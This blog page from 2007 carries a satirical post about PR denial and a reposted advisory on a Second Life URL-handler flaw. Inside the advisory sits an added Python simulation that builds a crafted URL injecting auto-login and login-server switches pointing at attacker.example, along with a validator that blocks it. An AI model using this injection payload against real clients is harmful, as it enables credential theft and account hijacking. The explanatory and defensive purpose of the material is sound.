Posted by Bruce Pilgrim Tuesday, September 18, 2007
Talking to My Cats: 9-18-07
Recently, some of the inestimable wit and wisdom of Baghdad Bob was highlighted in this space. For the next several weeks, I'll be digging deeper into some of Bob's best practices for the PR industry.
"Denial," Bob said, "is your friend. Americans are unbelievably gullible and they distrust the media. Denial buys you time to come up with a better idea – or implement your exit strategy and get the hell out of Dodge."
One advantage of denial is you can temporarily deflect attention from reality. The faithful will believe you, for a while. They'll believe almost anything, especially if you throw a big enough scare into them. Declare war on terror, or blame the Jews, or tell them reducing greenhouse gases will hurt the economy. Tell them that whatever happened didn't really happen. Or that it happened a lot differently than they've been led to believe.
Denial is certainly the first strategy most perps turn to when they're thrust into the spotlight. It's also one of the five stages of coping with death or tragedy. Even though denial almost never works, we keep trying it, even though fessing up to the truth is always the better way to go: you admit your mistake and move on. If you choose to cruise down denial, you'll inevitably be caught out, adding further charges to the original offense.
Even when we’re guilty of nothing, we still automatically play the denial card. When I was nine years old, playing catch with my dad in the backyard, a gust of wind slammed the back door shut suddenly, shattering the window glass. My dad looked at me and I immediately cried out: "I didn't do it. The wind did it." He laughed so hard he had to sit down.
Why did this seemingly instinctive, yet ludicrous, impulse to deny responsibility become the norm? Should we blame Dr. Benjamin Spock for cajoling parents to pamper all those baby boomers? This incredibly spoiled generation has, in turn, shielded, positively reinforced, and empowered their own issue to the point that, in two or three generations, sociopaths will be labeled as "unconventionally abled."
A serious client-side vulnerability affecting the accounts of Second Life residents has been discovered by the GNUCITIZEN group. It allows an attacker to steal a user's login credentials and hijack their account. With a one-line exploit, ANY USER PASSWORD CAN BE COMPROMISED. Second Life residents should treat this vulnerability as HIGH RISK and suspend online activities until further notice.
The vulnerability lies in the way the Internet Explorer URL protocol handler launches the Second Life client: a specially crafted URL can start the client and pass it arbitrary command line options. One of the flags used in the exploit instructs the client to log in automatically; another tells it which server to send the login details to over XML-RPC, and that server can be any HTTP server of the attacker's choosing. When the URL is opened, the client starts and sends the user's credentials to the attacker's server. The attacker collects them, resets the password to one they know, and thereby hijacks the victim's account.
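To make the mechanism concrete, the following Python simulation is an added example (not code from the GNUCITIZEN advisory or the Second Life client). It models a protocol handler registered as "client.exe" "%1", shows how a URL containing a double quote breaks out of its quoted argument and appends switches of the attacker's choosing, and adds the launcher-side check that would reject such a URL. The executable path, the switch names -autologin and -loginuri (stand-ins for the "auto login" and "send login to this server" flags the advisory describes), the attacker host and the sample region URL are all assumptions made for illustration; the argument splitter is a simplified model of the Windows parser that omits its backslash-escaping rules.

```python
# Added example (not GNUCITIZEN's or Linden Lab's code): simulates how an
# unescaped "%1" in a URL protocol-handler registration lets a crafted URL
# inject command line switches into the launched client, and shows a
# launcher-side check that rejects such URLs.
import re
from urllib.parse import urlsplit

# Assumed handler registration, in the shape Windows stores under
# HKCR\secondlife\shell\open\command. The executable path is hypothetical.
HANDLER_TEMPLATE = r'"C:\Program Files\SecondLife\client.exe" "%1"'

# Constructed attack URL. The switch names -autologin and -loginuri are
# assumed stand-ins for the "auto login" and "send login to this server"
# flags the advisory describes; attacker.example is a placeholder host.
MALICIOUS_URL = 'secondlife://" -autologin -loginuri "http://attacker.example/login'

# Constructed benign URL of the kind a web page would legitimately link to.
BENIGN_URL = "secondlife://Region/128/128/25"


def build_command_line(template, url):
    """Mimic the shell substituting the clicked URL for %1 without escaping."""
    return template.replace("%1", url)


def split_windows_cmdline(cmdline):
    """Simplified model of CommandLineToArgvW: whitespace separates arguments,
    double quotes group text containing whitespace. Backslash-escape rules of
    the real parser are omitted; they do not affect the quote breakout shown."""
    args, current, in_quotes, have_token = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
            have_token = True          # an empty "" still yields an argument
        elif ch in " \t" and not in_quotes:
            if have_token:
                args.append("".join(current))
                current, have_token = [], False
        else:
            current.append(ch)
            have_token = True
    if have_token:
        args.append("".join(current))
    return args


def argv_for_url(url):
    """Arguments the client process would receive for a clicked URL."""
    return split_windows_cmdline(build_command_line(HANDLER_TEMPLATE, url))


# RFC 3986 URL characters only: no double quote, whitespace or control chars,
# so the value can never terminate the quoted "%1" argument.
URL_CHARS = re.compile(r"^[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+$")


def validate_handler_url(url, expected_scheme="secondlife"):
    """Check a launcher should make before handing a URL to a client process:
    the value must consist solely of URL characters and carry the scheme the
    handler was registered for (so it cannot start with '-' and be read as a
    switch, nor point the client at a different protocol)."""
    if not URL_CHARS.fullmatch(url):
        return False
    return urlsplit(url).scheme.lower() == expected_scheme


if __name__ == "__main__":
    print("benign argv:   ", argv_for_url(BENIGN_URL))
    print("malicious argv:", argv_for_url(MALICIOUS_URL))
    print("malicious URL accepted by validator?", validate_handler_url(MALICIOUS_URL))
```

Run as a script, the malicious URL yields five arguments instead of two, the last four being exactly the switches the attacker chose. The check belongs in the launched program, applied to the raw argument it actually receives, rather than only on the web side, since what a browser hands to a handler after its own decoding may differ from the URL shown on the page; a client that accepts login-affecting switches from any URL is still exposed if only the browser filters.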
1. Conduct Industrial Espionage - Many real-world corporate initiatives debut in Second Life, which lets companies test programs at a very early stage, before any real-world expenditure is made. Hijacking SL identities gives attackers a preview of a competitor's long-term market strategy before it is launched in the real world.
2. Cause Financial Damage - Stolen credentials give the attacker access to the account's Linden dollar balance. Stealing those assets could bring about the virtual collapse of many small enterprises.
3. Implement Black PR - As with any society, Second Life has its own opinion shapers and leaders. The vulnerability lets attackers hijack key profiles to influence public opinion, or put rivals in unpleasant situations by faking irrational decisions, starting conflicts, spreading false or confusing information, or simply locking them out of the system. Bottom line: the attacker uses the hijacked account to defame the target in front of its current and prospective stakeholders.
According to Petko D. Petkov, founder and leading contributor of the GNUCITIZEN group: "Most attackers don't even have to convert the hash back to a password string. Attackers can log in with the hash itself by forging a request to one of the Second Life authentication servers. The unhashed password is only needed in situations where the attacker wants to explore other online services the victim is currently registered with."
The GNUCITIZEN group is an information technology security think-tank. Its recent research includes the latest 0day Apple QuickTime remote code execution vulnerability, in-depth analysis of Web 2.0 security issues and a database of the latest client-side cross-site scripting attack vectors. GNUCITIZEN members have taken part in numerous tiger-team sessions for some of the biggest financial institutions in the United Kingdom and abroad.
On Thursday, March 8, 2007 at 7:41 AM, Ronn Torossian, President and CEO of 5WPR, emphatically promised that he was going to sue us. No real reason, he was just irritated by our teasing him about getting in bed with pornographer Joe Francis. Anyway, Ronn gave his obscenity-laced word that we'd see the complaint in 72 hours. It's now late by